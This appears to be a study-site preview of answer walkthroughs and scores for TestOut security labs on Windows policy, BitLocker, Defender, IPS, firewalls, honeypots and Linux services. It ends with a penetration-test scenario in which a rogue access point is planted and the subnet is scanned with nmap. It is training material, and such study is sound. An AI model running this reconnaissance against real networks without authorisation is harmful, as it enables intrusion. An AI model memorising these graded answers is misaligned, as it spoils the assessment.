Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
“
Policy changes will not be enforced within the simulation.
”
Your Performance
Your Score: 8 of 8 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 4 seconds
Required Score: 100%
Task Summary
Required Actions
Require passwords of 10 characters or more
Force password changes every 30 days
Remember the last 4 passwords
Do not allow password changes within 2 days
Require complex passwords
Lock accounts after 4 invalid attempts
Count bad logon attempts within a 30 minute period
Unlock locked accounts after 60 minutes
Explanation
In this lab, your task is to edit the local security policy and configure settings as follows:
Policy Location
Policy
Setting
Account Policies/Password Policy
Enforce password history
4
Maximum password age
30
Minimum password age
2
Minimum password length
10
Passwords must meet complexity
requirements
Enabled
Account lockout threshold
4
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Account Policies/Account Lockout
Policy
Account lockout duration
60
Reset account lockout counter after
30
Complete this lab as follows:
1.
Select
Start
.
2.
Select
Windows Administrative Tools
.
3.
Select
Local Security Policy
.
4.
In the left pane, expand
Account Policies
.
5.
Select
Password Policy
.
6.
Double-click the
policy
you want to configure.
7.
Configure the
policy settings
.
8.
Click
OK
.
9.
Repeat steps 6
–
8 to configure additional policies.
10.
Select
Account Lockout Policy
.
11.
Repeat steps 6
–
8 to configure policy settings.
QUESTION 6:
You are the IT administrator at a small corporate office. You just
downloaded a new release for a program you use. You need to make
sure the file was not altered before you received it. Another file
containing the original file hash was also downloaded. The files are
located in C:\Downloads.
In this lab, your task is to use MD5 hash files to confirm that the
Release.zip file was unaltered as follows:
•
Use Windows PowerShell to generate a file hash for
Release.zip.
•
Examine the
release821hash.txt
file for the original hash.
•
Compare the original hash of the Release.zip file to its calculated
hash in PowerShell to see if they match.
At the prompt, type
"calculated hash"
-eq
"known hash"
and
press
Enter
.
The calculated hash is the hash generated by the
get-
filehash
file_name
-a md5
command and the known hash is
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
the hash generated by the
get-
content
file_name.txt
command. Remember to include the
quotation marks and the file extensions with the file names in
the commands.
“
You can highlight text in PowerShell and right-click it to copy the text
to the active line.
”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 36 seconds
Required Score: 100%
Task Summary
Lab Questions
Use the command get-filehash Release.zip -a md5
Use the command get-content release821hash.txt
Use the -eq command to compare the hashes
Q1
Do the file hashes match?
Explanation
In this lab, your task is to use MD5 hash files to confirm that the Release.zip file was unaltered as
follows:
•
Use Windows PowerShell to generate a file hash for Release.zip.
•
Examine the
release821hash.txt
file for the original hash.
•
Compare the original hash of the Release.zip file to its calculated hash in PowerShell to
see if they match.
Complete this lab as follows:
1.
Right-click
Start
and select
Windows PowerShell (Admin)
.
2.
At the prompt, type
cd \downloads
and press
Enter
to navigate to the directory that
contains the files.
3.
Type
dir
and press
Enter
to view the available files.
4.
Type
get-filehash Release.zip -a md5
and press
Enter
to view the MD5 hash.
5.
Type
get-content release821hash.txt
and press
Enter
to view the known hash
contained in the .txt file.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
6.
Type
"calculated hash"
-eq
"known hash"
and press
Enter
to determine if the file
hashes match.
7.
In the top right, select
Answer Questions
.
8.
Answer the question.
9.
Select
Score Lab
.
Lab Questions:
1.
Do the file hashes match?
1.
No
QUESTION 7:
You work as the IT Security Administrator for a small corporate
network. The employee in Office 1 is working on a very sensitive
project. Management is concerned that if the hard drive in the
computer were stolen, sensitive information could be compromised.
As a result, you have been asked to encrypt the entire System
volume. The Office1 computer has a built-in TPM on the motherboard.
In this lab, your task is to configure BitLocker drive encryption as
follows:
•
Turn on TPM in the BIOS.
•
Activate TPM in the BIOS.
•
Turn on BitLocker for the System (C:) drive.
•
Save the recovery key to
\\CorpServer\BU-Office1
.
•
Run the BitLocker system check.
•
Encrypt the entire
System (C:)
drive.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Elapsed Time: 6 minutes 49 seconds
Required Score: 100%
Task Summary
Required Actions
Enable the TPM
Activate the TPM
Turn on BitLocker for the System (C:) drive
Save the recovery key on CorpServer
Encrypt the entire drive
Run BitLocker system check
Explanation
In this lab, your task is to configure BitLocker drive encryption as follows:
•
Turn on TPM in the BIOS.
•
Activate TPM in the BIOS.
•
Turn on BitLocker for the Local Drive (C:) drive.
•
Save the recovery key to
\\CorpServer\BU-Office1
.
•
Run the BitLocker system check.
•
Encrypt the entire
Local Drive (C:)
drive.
Complete this lab as follows:
1.
In the search field on the taskbar, enter
Control Panel
.
2.
Select
System and Security
.
3.
Select
BitLocker Drive Encryption
.
4.
Select
Turn on BitLocker
next to C:.
5.
Notice, at the bottom of the window, that Windows indicates that a TPM was not found.
6.
Select
Cancel
.
7.
Select
Start
.
8.
Select
Power
.
9.
Select
Restart
to restart Office1 and activate TPM.
10.
When the TestOut logo appears, press
Delete
to enter the BIOS.
11.
Turn on and activate TPM as follows:
a.
In the left pane, expand
Security
.
b.
Select
TPM Security
.
c.
In the right pane, select
TPM Security
to turn TPM security on.
d.
Select
Apply
.
e.
Select
Activate
.
f.
Select
Apply
.
g.
Select
Exit
.
12.
Turn on BitLocker as follows:
a.
After Office1 finishes rebooting, in the search field, enter
Control Panel
.
b.
Select
System and Security
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
c.
Select
BitLocker Drive Encryption
.
d.
Select
Turn on BitLocker
. Now Windows is able to begin the Drive
Encryption setup.
e.
Select
Next
.
f.
Select
Restart
.
g.
Press
F10
.
h.
Select
Next
.
13.
Save the recovery key to \\CorpServer\BU-Office1 as follows:
a.
Select
Save to a file
to back up your recovery key to a file.
b.
Browse the network to
\\CorpServer\BU-Office1
.
c.
Select
Save
.
d.
After your recovery key is saved, click
Next
.
14.
Select
Encrypt entire drive
; then click
Next
.
15.
Leave the default setting selected when choosing the encryption mode and click
Next
.
16.
Select
Run BitLocker system check
; then click
Continue
.
17.
Select
Restart now
.
18.
When encryption is complete, click
Close
.
19.
Open File Explorer and verify that the Local Disk (C:) drive shows the lock icon.
QUESTION 8:
You recognize that the threat of malware is increasing and have
implemented Windows Defender on the office computers.
In this lab, your task is to configure Windows Defender as follows:
•
Add a file exclusion for
D:\Graphics\cat.jpg
.
•
Add a process exclusion for
welcome.scr
.
•
Update protection definitions before performing the scan.
•
Perform a quick scan.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 2 seconds
Required Score: 100%
Task Summary
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Required Actions
Add a file exclusion
Add a process exclusion
Update protection definitions before scanning
Perform a quick scan
Explanation
In this lab, your task is to configure Windows Defender as follows:
•
Add a file exclusion for
D:\Graphics\cat.jpg
.
•
Add a process exclusion for
welcome.scr
.
•
Check for updates before you perform the scan.
•
Perform a quick scan.
Complete this lab as follows:
1.
Add a file exclusion as follows:
a.
In the search field on the taskbar, enter
Windows Defender
.
b.
Under Best match, select
Windows Defender Security Center
.
c.
Maximize the window for easier viewing.
d.
Select
Virus & threat protection
.
e.
Select
Virus & threat protection settings
.
f.
Under Exclusions, select
Add or remove exclusions
.
g.
Select the
+
(plus sign) next to Add an exclusion.
h.
From the drop-down lists, select
File
.
i.
Under This PC, select
Data (D:)
.
j.
Double-click
Graphics
.
k.
Select
cat.jpg
.
l.
Select
Open
.
2.
Add a process exclusion as follows:
a.
Select the
+
(plus sign) next to Add an exclusion.
b.
From the drop-down lists, select
Process
.
c.
In the Enter process name field, enter
welcome.scr
for the process name.
d.
Select
Add
.
3.
Update protection definitions as follows:
a.
In the left menu, select the
shield
icon.
b.
Select
Protection updates
.
c.
Select
Check for updates
.
4.
Perform a quick scan as follows:
a.
In the left menu, select the
shield
icon.
b.
Under Scan History, select
Quick scan
to run a quick scan now.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 9:
You are enhancing your network's security, and you want to enable
Intrusion Detection and Prevention on the network security appliance
(NSA).
In this lab, your task is to:
•
Enable the IPS on the LAN and DMZ interface.
•
Manually update the IPS signature
using
C:\signatures\sbips000018.bin
•
Use the following credentials to configure the NSA to
automatically update the signature in the future:
o
Username:
mary.r.brown
o
Password:
Upd@teN0w
(0 is a zero)
•
Set the IPS policies to detect and prevent all known threats.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 38 seconds
Required Score: 100%
Task Summary
Required Actions
Enable IPS
Hide Details
Enable IPS for the LAN
Enable IPS for the DMZ
Update signature manually with SBIPS000018.bin
Set to update signature automatically
Hide Details
Automatically Update Signatures selected
User Name: mary.r.brown
Password: Upd@teN0w
Set IPS Policies to Detect and Prevent
Hide Details
Set Backdoor to Detect and Prevent
Set DOS to Detect and Prevent
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Set Exploit to Detect and Prevent
Set FTP to Detect and Prevent
Set LDAP to Detect and Prevent
Set Shellcode to Detect and Prevent
Set SQL-DB to Detect and Prevent
Set TrojanVirus to Detect and Prevent
Set WebServer to Detect and Prevent
Explanation
In this lab, your task is to:
•
Enable the IPS on the LAN and DMZ interface.
•
Manually update the IPS signature using
C:\signatures\sbips000018.bin
•
Use the following credentials to configure the NSA to automatically update the signature
in the future:
o
Username:
mary.r.brown
o
Password:
Upd@teN0w
(0 is a zero)
•
Set the IPS policies to detect and prevent all known threats.
Complete this lab as follows:
1.
Enable IPS as follows:
a.
In the Security Appliance Configuration utility, select
IPS
.
b.
Under IPS Enable, select
Enable IPS Protection for LAN
.
c.
Select
Enable IPS Protection for DMZ
.
d.
Select
Apply
.
2.
Update the IPS signature as follows:
a.
Under Manual Signature Updates, select
Browse
.
b.
Browse to and select
C:\Signatures\SBIPS000018.bin
.
c.
Select
Open
.
d.
Select
Upload
.
e.
Refresh the page to update the IPS Signatures status.
f.
Select
Automatically Update Signatures
.
g.
In the Cisco.com User Name field, enter
mary.r.brown
.
h.
In the Password field, enter
Upd@teN0w
(0 is a zero).
i.
Select
Apply
.
3.
Configure IPS policies as follows:
a.
In the left menu, select
IPS Policy
.
b.
For each IPS Category, select
Detect and Prevent
.
c.
Select
Apply
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 10:
You are the IT security administrator for a small corporate network.
You are concerned about unauthorized activity in your DMZ, so you
decide to set up a honeypot to study hacking attempts.
In this lab, your task is to:
•
Use Pentbox to create a honeypot on www_stage.
•
Test the honeypot on Consult-Lap
using
www_stage.corpnet.xyz
in Chrome.
•
Verify the intrusion on www_stage.
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 59 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Create a honeypot on www_stage
Browse to the honeypot from Consult_Lap
Q1
What message is displayed?
Q2
What is the IP address associated with the intrusion attempt?
Explanation
In this lab, your task is to:
•
Use Pentbox to create a honeypot on www_stage.
•
Test the honeypot on Consult-Lap using
www_stage.corpnet.xyz
in Chrome.
•
Verify the intrusion on www_stage.
•
Answer the questions.
Complete this lab as follows:
1.
Use Pentbox to create a honeypot on www_stage as follows:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
cd pentbox-1.8
and press
Enter
to change to the
pentbox directory.
c.
Type
./pentbox.rb
and press
Enter
to start Pentbox.
d.
Type
2
and press
Enter
to select Network Tools.
e.
Type
3
and press
Enter
to select Honeypot.
f.
Type
1
and press
Enter
to select Fast Auto Configuration.
2.
Test the honeypot using Chrome as follows:
a.
From the top navigation tabs, select
Buildings
.
b.
Under Red Cell, select
Consult-Lap
.
c.
From the task bar, open Chrome.
d.
In the URL field, enter
www_stage.corpnet.xyz
and press
Enter
.
e.
In the top right, select
Answer Questions
.
f.
Answer Question 1.
g.
Minimize the Lab Questions dialog.
3.
Review the effects of the intrusion on www_stage as follows:
a.
From the top navigation tabs, select
Buildings
.
b.
Under Building A, select
Basement
.
c.
Under Basement, select
www_stage
.
Notice the INTRUSION ATTEMPT DETECTED message at the bottom of the
Pentbox window.
4.
In the top right, select
Answer Questions
.
5.
Answer Question 2.
6.
Select
Score Lab
.
Lab Questions:
1.
What message is being displayed?
a.
Access Denied
2.
What is the IP address associated with the intrusion attempt?
a.
147.191.29.25
QUESTION 11:
As part of your ethical hacking testing, you determined that you can
obtain the zone information from the CorpDC3 server, which is a
domain controller in the CorpNet.local domain. This server holds an
Active Directory-integrated zone for the CorpNet.local domain.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
You have recommended that the company secure zone data to
prevent anyone from copying zone data from the CorpDC3 server
through zone transfer.
In this lab, your task is to disable zone transfers for the CorpNet.local
zone.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 51 seconds
Required Score: 100%
Task Summary
Required Actions
Disable zone transfers for the CorpNet.local zone
Explanation
In this lab, your task is to disable zone transfers for the CorpNet.local zone.
Complete this lab as follows:
1.
From Server Manager, select
Tools
>
DNS
.
2.
In the left pane, expand
CORPDC3
.
3.
Expand
Forward Lookup Zones
.
4.
Right-click
CorpNet.local
and select
Properties
.
5.
Select the
Zone Transfers
tab.
6.
Deselect
Allow zone transfers
.
7.
Click
OK
.
QUESTION 12:
You are the IT security administrator for a small corporate network.
You have had problems with users installing remote access services
like Remote Desktop Services and TeamViewer. You need to disable
and stop these services.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
In this lab, your task is to run a scan on the network with Zenmap to
ensure that there are no traces of any remote software running on the
network. Run the scan as follows:
•
Scan the network for services running on port
3389
, match the IP
address to the computer name in the table,
then
disable
and
stop
the
Remote Desktop Services
service
on that computer.
•
Scan the network for services running on port
5938
, match the IP
address to the computer name in the table,
then
disable
and
stop
the
TeamViewer
service on that
computer.
IP Address
Computer Name
192.168.0.30
Exec
192.168.0.31
ITAdmin
192.168.0.32
Gst-Lap
192.168.0.33
Office1
192.168.0.34
Office2
192.168.0.45
Support
192.168.0.46
IT-Laptop
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 16 seconds
Required Score: 100%
Task Summary
Required Actions
Disable and stop services on port 3389 on Office1
Hide Details
Use Zenmap to identify the target machines
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Remote Desktop Service disabled
Remote Desktop Service stopped
Disable and stop services on port 5938 on Exec
Hide Details
Use Zenmap to identify the target machines
TeamViewer disabled
TeamViewer stopped
Explanation
In this lab, your task is to run a scan on the network with Zenmap to ensure that there are no traces
of any remote software running on the network. Run the scan as follows:
•
Scan the network for services running on port
3389
, match the IP address to the
computer name in the table, then
disable
and
stop
the
Remote Desktop
Services
service on that computer.
•
Scan the network for services running on port
5938
, match the IP address to the
computer name in the table, then
disable
and
stop
the
TeamViewer
service on that
computer.
IP Address
Computer Name
192.168.0.30
Exec
192.168.0.31
ITAdmin
192.168.0.32
Gst-Lap
192.168.0.33
Office1
192.168.0.34
Office2
192.168.0.45
Support
192.168.0.46
IT-Laptop
Complete this lab as follows:
1.
From the Favorites bar, open Zenmap.
2.
In the Command field, type
nmap -p 3389 192.168.0.0/24
.
3.
Select
Scan
to scan the subnet for a given service.
4.
Using the table in the scenario, identify the
computer
with the open port using the IP
address.
5.
From the top navigation tabs, select
Floor 1 Overview
.
6.
Select the identified
computer
to enter its OS view.
7.
In the search field on the taskbar, type
Services
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
8.
Under Best match, select
Services
.
9.
Maximize the window for easier viewing.
10.
Double-click the
service
that needs to be stopped to open the Properties dialogue.
11.
From the Startup type drop-down list, select
Disabled
.
12.
Under Service status, select
Stop
.
13.
Select
OK
.
14.
From the top navigation tabs, select
Floor 1 Overview
.
15.
Under IT Administration, select
IT-Laptop
.
16.
In Zenmap's Command Field, enter
nmap -p 5938 192.168.0.0/24
.
17.
Repeat steps 3
–
13.
QUESTION 13:
While working on your Linux server, you want to practice
starting, stopping, and restarting a service using
the
systemctl
command.
“
You are logged in as root so the
sudo
command is not necessary.
”
In this lab, your task is to:
•
Use the
systemctl
command to start bluetooth.service.
•
Use the
systemctl
command to stop bluetooth.service.
•
Use the
systemctl
command to restart bluetooth.service.
“
After each command, you can check the service status with
the
systemctl
command.
”
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 19 seconds
Required Score: 100%
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Task Summary
Required Actions
Start service
Stop service
Restart service
Explanation
In this lab, your task is to:
•
Use the
systemctl
command to start bluetooth.service.
•
Use the
systemctl
command to stop bluetooth.service.
•
Use the
systemctl
command to restart bluetooth.service.
Complete this lab as follows:
1.
At the prompt, type
systemctl start bluetooth.service
and press
Enter
to start
bluetooth.service.
2.
Type
systemctl stop bluetooth.service
and press
Enter
to stop bluetooth.service.
3.
Type
systemctl restart bluetooth.service
and press
Enter
to restart bluetooth.service.
QUESTION 14:
While working on your Linux server, you want to enable
anaconda.service and disable vmtoolsd.service using
the
systemctl
command.
“
You are logged in as root so the
sudo
command is not necessary.
”
In this lab, your task is to:
•
Use the
systemctl
command to enable anaconda.service.
•
Use the
systemctl
command to disable vmtoolsd.service.
•
After each command, check the service status with
the
systemctl
is-enabled
command.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 26 seconds
Required Score: 100%
Task Summary
Required Actions
Enable service
Disable service
Explanation
In this lab, your task is to:
•
Use the
systemctl
command to enable anaconda.service.
•
Use the
systemctl
command to disable vmtoolsd.service.
•
After each command, check the service status with the
systemctl
is-enabled
command.
Complete this lab as follows:
1.
At the prompt, type
systemctl enable anaconda.service
and press
Enter
to enable
anaconda.service.
2.
Type
systemctl
is-enabled anaconda.service
and press
Enter
to check the service
status.
3.
Type
systemctl disable vmtoolsd.service
and press
Enter
to disable vmtoolsd.service.
4.
Type
systemctl
is-enabled vmtoolsd.service
and press
Enter
to check the service
status.
QUESTION 15:
Based on your review of physical security, you have recommended
several improvements. Your plan includes smart card readers, IP
cameras, signs, and access logs.
Smart cards have the ability to encrypt access information. Smart
cards can require contact or be contactless. Proximity cards, also
known as RFID (radio frequency identification) cards, are a subset of
smart cards that use the 125 kHz frequency to communicate with
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
proximity readers. Proximity cards differ from smart cards because
they are designed to only communicate the card's ID, but the smart
card can communicate more information.
Use IP security cameras because they operate over the TCP/IP
network.
Implement your physical security plan by dragging the correct items
from the shelf into the various locations in the building. As you drag
the items from the shelf, the possible drop locations are highlighted.
Not all items on the shelf will be used.
In this lab, your task is to:
•
Install the smart card key readers in the appropriate location to
control access to key infrastructure. The key card readers
should be contactless and record more than the card's ID.
•
Install the IP security cameras in the appropriate location to
record which employees access the key infrastructure. The
security cameras should operate over the TCP/IP network.
•
Install a Restricted Access sign on the networking closet door to
control access to the infrastructure.
•
Install the visitor log on the Lobby desk.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 31 seconds
Required Score: 100%
Task Summary
Required Actions
Install the smart card key readers
Hide Details
Install the card reader outside the building's front door
Install the card reader outside the Networking Closet door
Install the IP security cameras
Hide Details
Install the IP security camera inside the Networking Closet
Install the IP security camera outside the Networking Closet
Install the Restricted Access sign on the Networking Closet door
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Install the visitor log on the Lobby desk
Explanation
In this lab, your task is to:
•
Install the smart card key readers
•
Install the IP security cameras
•
Install the Restricted Access sign on the networking closet door
•
Install the visitor log on the Lobby desk
Complete this lab as follows:
1.
Install the smart card key readers as follows:
a.
On the Shelf, expand
Door Locks
.
b.
Drag a
Smart Card Reader
from the shelf to the highlighted location outside
the building's front door.
c.
Drag a
Smart Card Reader
from the shelf to the highlighted location outside
the Networking Closet's door.
2.
Install the IP security cameras as follows:
a.
On the Shelf, expand
CCTV Cameras
.
b.
Drag the
IP Security Camera
from the shelf to the highlighted circle inside
the Networking Closet.
c.
Drag the
IP Security Camera
from the shelf to just outside the Networking
Closet.
3.
Install the Restricted Access sign as follows:
a.
On the Shelf, expand
Restricted Access Signs
.
b.
Drag the
Restricted Access Sign
from the shelf to the Networking Closet
door.
4.
Install the visitor log as follows:
a.
On the Shelf, expand
Visitor Logs
.
b.
Drag the Visitor Log from the shelf to the Lobby desk.
QUESTION 16:
You work as the IT security administrator for a small corporate
network. You recently placed a web server in the DMZ. You need to
configure the perimeter firewall on the network security appliance to
allow access to the web server from the LAN and the WAN. You
would also like to improve security by utilizing the attack security
features provided by the firewall.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
In this lab, your task is to:
•
Add an HTTP firewall rule that allows traffic from the WAN to the
web server in the DMZ.
Parameter
Setting
From Zone
UNSECURE (WAN)
To Zone
DMZ
Service
HTTP
Action
Allow Always
Source Hosts
Any
Internal IP Address
172.16.2.100
External IP Address
Dedicated WAN
•
Add an HTTPS firewall rule that allows traffic from the WAN to
the web server in the DMZ.
Parameter
Setting
From Zone
UNSECURE (WAN)
To Zone
DMZ
Service
HTTPS
Action
Allow Always
Source Hosts
Any
Internal IP Address
172.16.2.100
External IP Address
Dedicated WAN
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Add a firewall rule to allow traffic from the LAN to the DMZ.
Parameter
Setting
From Zone
SECURE (LAN)
To Zone
DMZ
Service
Any
Action
Allow Always
Source Hosts
Any
Destination Hosts
Any
•
Enable all the firewall attack checks.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 42 seconds
Required Score: 100%
Task Summary
Required Actions
Add an HTTP firewall rule that allows traffic from the WAN to the web server in the DMZ
Hide
Details
From Zone: UNSECURE (WAN)
To Zone: DMZ
Service: HTTP
Action: Allow Always
Source Hosts: Any
Internal IP Address: 172.16.2.100
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
External IP Address: Dedicated WAN
Add an HTTPS firewall rule that allows traffic from the WAN to the web server in the DMZ
Hide
Details
From Zone: UNSECURE (WAN)
To Zone: DMZ
Service: HTTPS
Action: Allow Always
Source Hosts: Any
Internal IP Address: 172.16.2.100
External IP Address: Dedicated WAN
Add a firewall rule to allow traffic from the LAN to the DMZ
Hide Details
From Zone: SECURE (LAN)
To Zone: DMZ
Service: Any
Action: Allow Always
Enable WAN security checks
Hide Details
Block Ping to WAN interface
Enable Stealth Mode
Block TCP Flood
Enable LAN security checks
Enable ICSA settings
Hide Details
Block ICMP Notification
Block Fragmented Packets
Block Multicast Packets
Explanation
In this lab, your task is to:
•
Add an HTTP firewall rule that allows traffic from the WAN to the web server in the DMZ.
Parameter
Setting
From Zone
UNSECURE (WAN)
To Zone
DMZ
Service
HTTP
Action
Allow Always
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Source Hosts
Any
Internal IP Address
172.16.2.100
External IP Address
Dedicated WAN
•
Add an HTTPS firewall rule that allows traffic from the WAN to the web server in the
DMZ.
Parameter
Setting
From Zone
UNSECURE (WAN)
To Zone
DMZ
Service
HTTPS
Action
Allow Always
Source Hosts
Any
Internal IP Address
172.16.2.100
External IP Address
Dedicated WAN
•
Add a firewall rule to allow traffic from the LAN to the DMZ.
Parameter
Setting
From Zone
SECURE (LAN)
To Zone
DMZ
Service
Any
Action
Allow Always
Source Hosts
Any
Destination Hosts
Any
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Enable all the firewall attack checks.
Complete this lab as follows:
1.
Configure the firewall as follows:
a.
From the top menu of the Security Appliance Configuration Utility,
select
Firewall
.
b.
From the left pane, select
IPv4 Rules
.
c.
In the right pane, select
Add
.
d.
Modify the
firewall rule parameters
.
e.
Click
Apply
.
f.
Repeat steps 1c
–
1e for each firewall rule.
2.
Enable firewall attack checks as follows:
a.
From the left pane, select
Attacks
.
b.
Select all the
WAN security checks
.
c.
Select all the
LAN security checks
.
d.
Select all the
ICSA settings
.
e.
Click
Apply
.
A.3 TestOut Random Labs Not Included in
the Practice Labs
QUESTION 1:
9.2.7 Scan for Open Ports from a Remote Computer
CorpNet.xyz has hired you as a penetration testing consultant. While
visiting the company, you connected a small computer to the switch in
the Networking Closet. This computer also functions as a rogue
wireless access point. Now you are sitting in your van in the parking
lot of CorpNet.xyz, where you are connected to the internal network
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
through the rogue wireless access point. Using the small computer
you left behind, you can perform remote exploits against the company.
In this lab, your task is to:
•
Use
ssh -X
to connect to your rogue computer
(192.168.0.251).
•
Use
1worm4b8
as the root password.
•
Use Zenmap on the remote computer to scan all the ports
on the internal network looking for computers vulnerable to
attack.
•
Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 37 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use ssh -X to connect to the remote computer
Use Zenmap to scan 192.168.0.0/24
Q1
Which of the following computers have vulnerable open ports?
Your answer: 192.168.0.10, 192.168.0.11, 192.168.0.14, 192.168.0.45
Correct answer: 192.168.0.10, 192.168.0.11, 192.168.0.14, 192.168.0.45
Explanation
In this lab, your task is to:
•
Use
ssh -X
to connect to your rogue computer (192.168.0.251).
•
Use
1worm4b8
as the root password.
•
Use Zenmap on the remote computer to scan all the ports on the internal network
looking for computers vulnerable to attack.
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
2.
At the prompt, type
ssh -X 192.168.0.251
and press
Enter
.
3.
For the root password, type
1worm4b8
and press
Enter
.
You are now connected to Rogue1.
4.
Type
zenmap
and press
Enter
to launch Zenmap remotely.
Zenmap is running on the remote computer, but you see the screen locally.
5.
In the Command field, type
nmap -p- 192.168.0.0/24
.
6.
Select
Scan
.
7.
From the results, find the computers with ports open that make them vulnerable to
attack.
8.
In the top right, select
Answer Questions
.
9.
Answer the question.
10.
Select
Score Lab
.
QUESTION 2:
10.1.8 Poison ARP and Analyze with Wireshark
You are the IT security administrator for a small corporate network.
You believe a hacker has penetrated your network and is using ARP
poisoning to infiltrate it.
In this lab, your task is to discover whether ARP poisoning is taking
place as follows:
•
Use Wireshark to capture packets on the enp2s0 interface
for five seconds.
•
Analyze the Wireshark packets to determine whether ARP
poisoning is taking place.
•
Use the 192.168.0.2 IP address to help make your
determination.
•
Answer the questions.
Your Performance
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 7 minutes 6 seconds
Required Score: 100%
Task Summary
Lab Questions
Q1
What is the MAC address of the first responding device?
Your answer: 00:00:1B:11:22:33
Correct answer: 00:00:1B:11:22:33
Q2
What was the MAC address of the duplicate responding device?
Your answer: 00:00:1B:33:22:11
Correct answer: 00:00:1B:33:22:11
Explanation
In this lab, your task is to discover if ARP poisoning is happening as follows:
•
Use Wireshark to capture packets on the enp2s0 interface for five seconds.
•
Analyze the Wireshark packets to determine whether ARP poisoning is taking place.
•
Use the 192.168.0.2 IP address to help make your determination.
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Maximize the window for easier viewing.
3.
Under Capture, select
enp2s0
.
4.
Select the blue fin to begin a Wireshark capture.
5.
After capturing packets for 5 seconds, select the
red box
to stop the Wireshark capture.
6.
In the Apply a display filter field, type
arp
and press
Enter
to only show ARP packets.
7.
In the Info column, look for the
lines
containing the 192.168.0.2 IP address.
8.
In the top right, select
Answer Questions
.
9.
Answer the questions.
10.
Select
Score Lab
.
QUESTION 3:
0.1.10 Poison DNS
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
You are the IT security administrator for a small corporate network.
